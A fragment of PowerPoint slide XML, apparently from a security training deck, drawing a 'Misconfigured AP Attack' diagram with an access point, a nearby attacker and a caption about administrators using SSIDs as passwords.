              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="860668" y="1634000"/>
                <a:ext cx="732610" cy="73152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1" name="Oval 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="black">
              <a:xfrm>
                <a:off x="1043821" y="1816880"/>
                <a:ext cx="366305" cy="36576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pic>
          <p:nvPicPr>
            <p:cNvPr id="1038" name="Picture 4" descr="F:\Icons\Icons\chat-bubble-37.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print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314892" y="4465916"/>
              <a:ext cx="1023582" cy="914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39" name="Rectangle 1038"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3333676" y="4665549"/>
              <a:ext cx="992130" cy="46166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Here is the access point</a:t>
              </a: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3" name="Text Box 2985">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{106F61E6-63BA-4B90-8A2E-735F227F53EA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1878441" y="5776297"/>
              <a:ext cx="180922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Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Attacker in a Neighboring Area</a:t>
              </a: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B8E9B9CC-8EE3-490D-A600-9312C8012072}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1202254" y="4296959"/>
              <a:ext cx="1411542" cy="1132391"/>
              <a:chOff x="-692388" y="3215504"/>
              <a:chExt cx="1411542" cy="1132391"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1041" name="Picture 1040">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA775121-946A-491F-9328-7DA1C95514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692388" y="3215504"/>
                <a:ext cx="1408039" cy="1132391"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1042" name="Picture 1041" descr="A picture containing bridge&#10;&#10;Description automatically generated">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83E91E8-9914-46AD-A0C0-F060E1E5F076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21021"/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="284469" y="3288297"/>
                <a:ext cx="434685" cy="357663"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1037" name="Picture 1036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A7CE965E-AB8B-4CCC-98C8-20343681047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5743539" y="2772730"/>
              <a:ext cx="344501" cy="283459"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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84690AF-FCB4-4EEE-9354-735716EF029F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5263042" y="4794971"/>
            <a:ext cx="521648" cy="537454"/>
            <a:chOff x="5904876" y="4847351"/>
            <a:chExt cx="521648" cy="537454"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1040" name="Oval 1039">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BE5F2B3-30FF-42B4-8971-9303BAFD014F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5904876" y="4847351"/>
              <a:ext cx="521648" cy="537454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4" name="Freeform 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D44BB20-9E10-4E28-8BBE-1D169F3069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019365" y="4977919"/>
              <a:ext cx="292670" cy="276319"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 142082 w 178"/>
                <a:gd name="T1" fmla="*/ 0 h 168"/>
                <a:gd name="T2" fmla="*/ 284163 w 178"/>
                <a:gd name="T3" fmla="*/ 60684 h 168"/>
                <a:gd name="T4" fmla="*/ 260217 w 178"/>
                <a:gd name="T5" fmla="*/ 91026 h 168"/>
                <a:gd name="T6" fmla="*/ 142082 w 178"/>
                <a:gd name="T7" fmla="*/ 38327 h 168"/>
                <a:gd name="T8" fmla="*/ 23946 w 178"/>
                <a:gd name="T9" fmla="*/ 91026 h 168"/>
                <a:gd name="T10" fmla="*/ 0 w 178"/>
                <a:gd name="T11" fmla="*/ 60684 h 168"/>
                <a:gd name="T12" fmla="*/ 142082 w 178"/>
                <a:gd name="T13" fmla="*/ 0 h 168"/>
                <a:gd name="T14" fmla="*/ 142082 w 178"/>
                <a:gd name="T15" fmla="*/ 95817 h 168"/>
                <a:gd name="T16" fmla="*/ 225095 w 178"/>
                <a:gd name="T17" fmla="*/ 138934 h 168"/>
                <a:gd name="T18" fmla="*/ 204342 w 178"/>
                <a:gd name="T19" fmla="*/ 166082 h 168"/>
                <a:gd name="T20" fmla="*/ 142082 w 178"/>
                <a:gd name="T21" fmla="*/ 134144 h 168"/>
                <a:gd name="T22" fmla="*/ 79821 w 178"/>
                <a:gd name="T23" fmla="*/ 166082 h 168"/>
                <a:gd name="T24" fmla="*/ 59068 w 178"/>
                <a:gd name="T25" fmla="*/ 138934 h 168"/>
                <a:gd name="T26" fmla="*/ 142082 w 178"/>
                <a:gd name="T27" fmla="*/ 95817 h 168"/>
                <a:gd name="T28" fmla="*/ 142082 w 178"/>
                <a:gd name="T29" fmla="*/ 191634 h 168"/>
                <a:gd name="T30" fmla="*/ 180396 w 178"/>
                <a:gd name="T31" fmla="*/ 229960 h 168"/>
                <a:gd name="T32" fmla="*/ 142082 w 178"/>
                <a:gd name="T33" fmla="*/ 268287 h 168"/>
                <a:gd name="T34" fmla="*/ 103767 w 178"/>
                <a:gd name="T35" fmla="*/ 229960 h 168"/>
                <a:gd name="T36" fmla="*/ 142082 w 178"/>
                <a:gd name="T37" fmla="*/ 191634 h 16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8" h="168">
                  <a:moveTo>
                    <a:pt x="89" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="0"/>
                    <a:pt x="156" y="15"/>
                    <a:pt x="178" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="57"/>
                    <a:pt x="163" y="57"/>
                    <a:pt x="163" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="37"/>
                    <a:pt x="119" y="24"/>
                    <a:pt x="89" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="24"/>
                    <a:pt x="33" y="37"/>
                    <a:pt x="15" y="5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2" y="15"/>
                    <a:pt x="54" y="0"/>
                    <a:pt x="89" y="0"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="89" y="60"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="60"/>
                    <a:pt x="129" y="71"/>
                    <a:pt x="141" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="104"/>
                    <a:pt x="128" y="104"/>
                    <a:pt x="128" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="92"/>
                    <a:pt x="105" y="84"/>
                    <a:pt x="89" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="84"/>
                    <a:pt x="59" y="92"/>
                    <a:pt x="50" y="104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49" y="71"/>
                    <a:pt x="68" y="60"/>
                    <a:pt x="89" y="60"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="89" y="120"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="120"/>
                    <a:pt x="113" y="131"/>
                    <a:pt x="113" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="157"/>
                    <a:pt x="102" y="168"/>
                    <a:pt x="89" y="168"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="168"/>
                    <a:pt x="65" y="157"/>
                    <a:pt x="65" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="131"/>
                    <a:pt x="76" y="120"/>
                    <a:pt x="89" y="12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E0836D7-284F-4D5D-AC7D-E0A81E091EFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5257800" y="5708323"/>
            <a:ext cx="532133" cy="553740"/>
            <a:chOff x="5899634" y="5658055"/>
            <a:chExt cx="532133" cy="553740"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1043" name="Oval 1042">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23165AE2-4D16-4288-B11F-DCC7CDA44716}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5899634" y="5658055"/>
              <a:ext cx="532133" cy="55374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5" name="Freeform 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7D8756F-227F-4CA7-8973-30ABDF696D9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024722" y="5808486"/>
              <a:ext cx="281957" cy="252879"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 415925 w 256"/>
                <a:gd name="T1" fmla="*/ 324988 h 212"/>
                <a:gd name="T2" fmla="*/ 396429 w 256"/>
                <a:gd name="T3" fmla="*/ 344487 h 212"/>
                <a:gd name="T4" fmla="*/ 396429 w 256"/>
                <a:gd name="T5" fmla="*/ 344487 h 212"/>
                <a:gd name="T6" fmla="*/ 19496 w 256"/>
                <a:gd name="T7" fmla="*/ 344487 h 212"/>
                <a:gd name="T8" fmla="*/ 19496 w 256"/>
                <a:gd name="T9" fmla="*/ 344487 h 212"/>
                <a:gd name="T10" fmla="*/ 19496 w 256"/>
                <a:gd name="T11" fmla="*/ 344487 h 212"/>
                <a:gd name="T12" fmla="*/ 0 w 256"/>
                <a:gd name="T13" fmla="*/ 324988 h 212"/>
                <a:gd name="T14" fmla="*/ 3249 w 256"/>
                <a:gd name="T15" fmla="*/ 313613 h 212"/>
                <a:gd name="T16" fmla="*/ 3249 w 256"/>
                <a:gd name="T17" fmla="*/ 313613 h 212"/>
                <a:gd name="T18" fmla="*/ 191715 w 256"/>
                <a:gd name="T19" fmla="*/ 8125 h 212"/>
                <a:gd name="T20" fmla="*/ 191715 w 256"/>
                <a:gd name="T21" fmla="*/ 8125 h 212"/>
                <a:gd name="T22" fmla="*/ 207963 w 256"/>
                <a:gd name="T23" fmla="*/ 0 h 212"/>
                <a:gd name="T24" fmla="*/ 224210 w 256"/>
                <a:gd name="T25" fmla="*/ 9750 h 212"/>
                <a:gd name="T26" fmla="*/ 224210 w 256"/>
                <a:gd name="T27" fmla="*/ 9750 h 212"/>
                <a:gd name="T28" fmla="*/ 412676 w 256"/>
                <a:gd name="T29" fmla="*/ 315238 h 212"/>
                <a:gd name="T30" fmla="*/ 412676 w 256"/>
                <a:gd name="T31" fmla="*/ 315238 h 212"/>
                <a:gd name="T32" fmla="*/ 415925 w 256"/>
                <a:gd name="T33" fmla="*/ 324988 h 212"/>
                <a:gd name="T34" fmla="*/ 233958 w 256"/>
                <a:gd name="T35" fmla="*/ 110496 h 212"/>
                <a:gd name="T36" fmla="*/ 207963 w 256"/>
                <a:gd name="T37" fmla="*/ 84497 h 212"/>
                <a:gd name="T38" fmla="*/ 181967 w 256"/>
                <a:gd name="T39" fmla="*/ 110496 h 212"/>
                <a:gd name="T40" fmla="*/ 181967 w 256"/>
                <a:gd name="T41" fmla="*/ 207992 h 212"/>
                <a:gd name="T42" fmla="*/ 207963 w 256"/>
                <a:gd name="T43" fmla="*/ 233991 h 212"/>
                <a:gd name="T44" fmla="*/ 233958 w 256"/>
                <a:gd name="T45" fmla="*/ 207992 h 212"/>
                <a:gd name="T46" fmla="*/ 233958 w 256"/>
                <a:gd name="T47" fmla="*/ 110496 h 212"/>
                <a:gd name="T48" fmla="*/ 207963 w 256"/>
                <a:gd name="T49" fmla="*/ 253490 h 212"/>
                <a:gd name="T50" fmla="*/ 181967 w 256"/>
                <a:gd name="T51" fmla="*/ 279489 h 212"/>
                <a:gd name="T52" fmla="*/ 207963 w 256"/>
                <a:gd name="T53" fmla="*/ 305488 h 212"/>
                <a:gd name="T54" fmla="*/ 233958 w 256"/>
                <a:gd name="T55" fmla="*/ 279489 h 212"/>
                <a:gd name="T56" fmla="*/ 207963 w 256"/>
                <a:gd name="T57" fmla="*/ 253490 h 21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56" h="212">
                  <a:moveTo>
                    <a:pt x="256" y="200"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="207"/>
                    <a:pt x="251" y="212"/>
                    <a:pt x="244" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244" y="212"/>
                    <a:pt x="244" y="212"/>
                    <a:pt x="244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5" y="212"/>
                    <a:pt x="0" y="207"/>
                    <a:pt x="0" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="198"/>
                    <a:pt x="1" y="195"/>
                    <a:pt x="2" y="193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20" y="2"/>
                    <a:pt x="124" y="0"/>
                    <a:pt x="128" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="0"/>
                    <a:pt x="136" y="2"/>
                    <a:pt x="138" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="6"/>
                    <a:pt x="138" y="6"/>
                    <a:pt x="138" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254" y="194"/>
                    <a:pt x="254" y="194"/>
                    <a:pt x="254" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254" y="194"/>
                    <a:pt x="254" y="194"/>
                    <a:pt x="254" y="194"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="255" y="196"/>
                    <a:pt x="256" y="198"/>
                    <a:pt x="256" y="200"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="144" y="68"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="59"/>
                    <a:pt x="137" y="52"/>
                    <a:pt x="128" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="52"/>
                    <a:pt x="112" y="59"/>
                    <a:pt x="112" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="128"/>
                    <a:pt x="112" y="128"/>
                    <a:pt x="112" y="128"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="137"/>
                    <a:pt x="119" y="144"/>
                    <a:pt x="128" y="144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="144"/>
                    <a:pt x="144" y="137"/>
                    <a:pt x="144" y="128"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="144" y="68"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="128" y="156"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="156"/>
                    <a:pt x="112" y="163"/>
                    <a:pt x="112" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112" y="181"/>
                    <a:pt x="119" y="188"/>
                    <a:pt x="128" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="188"/>
                    <a:pt x="144" y="181"/>
                    <a:pt x="144" y="172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="163"/>
                    <a:pt x="137" y="156"/>
                    <a:pt x="128" y="15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17024008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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF34323-FD49-49B2-9E50-65FBBCC05421}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2487586" y="158750"/>
            <a:ext cx="7216829" cy="58578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IN" sz="3600" b="1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Misconfigured </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1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AP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1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Attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" b="1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</a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Freeform 2244">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98C1FC95-5D1E-406D-ABC1-E4069D583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7313" y="3876808"/>
            <a:ext cx="1020947" cy="1035191"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 958 w 959"/>
              <a:gd name="T1" fmla="*/ 483 h 968"/>
              <a:gd name="T2" fmla="*/ 958 w 959"/>
              <a:gd name="T3" fmla="*/ 483 h 968"/>
              <a:gd name="T4" fmla="*/ 484 w 959"/>
              <a:gd name="T5" fmla="*/ 967 h 968"/>
              <a:gd name="T6" fmla="*/ 0 w 959"/>
              <a:gd name="T7" fmla="*/ 483 h 968"/>
              <a:gd name="T8" fmla="*/ 484 w 959"/>
              <a:gd name="T9" fmla="*/ 0 h 968"/>
              <a:gd name="T10" fmla="*/ 958 w 959"/>
              <a:gd name="T11" fmla="*/ 483 h 9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59" h="968">
                <a:moveTo>
                  <a:pt x="958" y="483"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="958" y="483"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="958" y="746"/>
                  <a:pt x="746" y="967"/>
                  <a:pt x="484" y="967"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="212" y="967"/>
                  <a:pt x="0" y="746"/>
                  <a:pt x="0" y="483"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="221"/>
                  <a:pt x="212" y="0"/>
                  <a:pt x="484" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="746" y="0"/>
                  <a:pt x="958" y="221"/>
                  <a:pt x="958" y="483"/>
                </a:cubicBezTo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217"/>
            <a:endParaRPr lang="en-US" sz="2480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" name="Freeform 165">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBE95442-E7F8-4863-A968-285B8DD952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4153" y="4800600"/>
            <a:ext cx="2684254" cy="1600200"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1665 w 1666"/>
              <a:gd name="T1" fmla="*/ 3493 h 3494"/>
              <a:gd name="T2" fmla="*/ 0 w 1666"/>
              <a:gd name="T3" fmla="*/ 3493 h 3494"/>
              <a:gd name="T4" fmla="*/ 0 w 1666"/>
              <a:gd name="T5" fmla="*/ 0 h 3494"/>
              <a:gd name="T6" fmla="*/ 1665 w 1666"/>
              <a:gd name="T7" fmla="*/ 0 h 3494"/>
              <a:gd name="T8" fmla="*/ 1665 w 1666"/>
              <a:gd name="T9" fmla="*/ 3493 h 34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66" h="3494">
                <a:moveTo>
                  <a:pt x="1665" y="3493"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="3493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="3493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pPr defTabSz="914217"/>
            <a:endParaRPr lang="en-US" sz="830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" name="Freeform 171">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B9298B-BFDE-44A7-A0A1-BAE6C1E7E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4153" y="4387805"/>
            <a:ext cx="2684255" cy="423933"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1665 w 1666"/>
              <a:gd name="T1" fmla="*/ 0 h 502"/>
              <a:gd name="T2" fmla="*/ 0 w 1666"/>
              <a:gd name="T3" fmla="*/ 0 h 502"/>
              <a:gd name="T4" fmla="*/ 0 w 1666"/>
              <a:gd name="T5" fmla="*/ 501 h 502"/>
              <a:gd name="T6" fmla="*/ 1665 w 1666"/>
              <a:gd name="T7" fmla="*/ 501 h 502"/>
              <a:gd name="T8" fmla="*/ 1665 w 1666"/>
              <a:gd name="T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66" h="502">
                <a:moveTo>
                  <a:pt x="1665" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1665" y="0"/>
                </a:lnTo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217"/>
            <a:endParaRPr lang="en-US" sz="830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CD3A963-4413-42BE-BF38-EA8935C4F7ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3648122" y="4819956"/>
            <a:ext cx="2399329" cy="1095666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="109710" tIns="54855" rIns="109710" bIns="54855" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To verify authorized users, network administrators </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incorrectly use the SSIDs as passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 250">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65BA89F6-E41B-4607-B201-99CFC4AFBE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65456" y="4466646"/>
            <a:ext cx="1564660" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1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1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914217">
              <a:tabLst>
                <a:tab pos="0" algn="l"/>
                <a:tab pos="228600" algn="l"/>
                <a:tab pos="457200" algn="l"/>
                <a:tab pos="685800" algn="l"/>
                <a:tab pos="914400" algn="l"/>
                <a:tab pos="1143000" algn="l"/>
                <a:tab pos="1371600" algn="l"/>
                <a:tab pos="1600200" algn="l"/>
                <a:tab pos="1828800" algn="l"/>
                <a:tab pos="2057400" algn="l"/>
                <a:tab pos="2286000" algn="l"/>
                <a:tab pos="2514600" algn="l"/>
                <a:tab pos="2743200" algn="l"/>
                <a:tab pos="2971800" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
                <a:tab pos="3429000" algn="l"/>
                <a:tab pos="3657600" algn="l"/>
                <a:tab pos="3886200" algn="l"/>
                <a:tab pos="4114800" algn="l"/>
                <a:tab pos="4343400" algn="l"/>
                <a:tab pos="4572000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:cs typeface="Lato Regular"/>
              </a:rPr>
              <a:t>Weak Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Freeform 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{599084C6-A787-48C1-92F9-325E0862D26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345319" y="5172491"/>
            <a:ext cx="310896" cy="692787"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 739 w 740"/>
              <a:gd name="T1" fmla="*/ 1662 h 1663"/>
              <a:gd name="T2" fmla="*/ 0 w 740"/>
              <a:gd name="T3" fmla="*/ 830 h 1663"/>
              <a:gd name="T4" fmla="*/ 739 w 740"/>
              <a:gd name="T5" fmla="*/ 0 h 1663"/>
              <a:gd name="T6" fmla="*/ 739 w 740"/>
              <a:gd name="T7" fmla="*/ 1662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63">
                <a:moveTo>
                  <a:pt x="739" y="1662"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="739" y="1662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pPr defTabSz="914217"/>
            <a:endParaRPr lang="en-US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" name="Freeform 2244">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A858871B-8C86-47AF-993E-3EF66C9D6C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12226" y="3876808"/>
            <a:ext cx="1020947" cy="1035191"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 958 w 959"/>
              <a:gd name="T1" fmla="*/ 483 h 968"/>
              <a:gd name="T2" fmla="*/ 958 w 959"/>
              <a:gd name="T3" fmla="*/ 483 h 968"/>
              <a:gd name="T4" fmla="*/ 484 w 959"/>
              <a:gd name="T5" fmla="*/ 967 h 968"/>
              <a:gd name="T6" fmla="*/ 0 w 959"/>
              <a:gd name="T7" fmla="*/ 483 h 968"/>
              <a:gd name="T8" fmla="*/ 484 w 959"/>
              <a:gd name="T9" fmla="*/ 0 h 968"/>
              <a:gd name="T10" fmla="*/ 958 w 959"/>
              <a:gd name="T11" fmla="*/ 483 h 9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59" h="968">
                <a:moveTo>
                  <a:pt x="958" y="483"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="958" y="483"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="958" y="746"/>
                  <a:pt x="746" y="967"/>
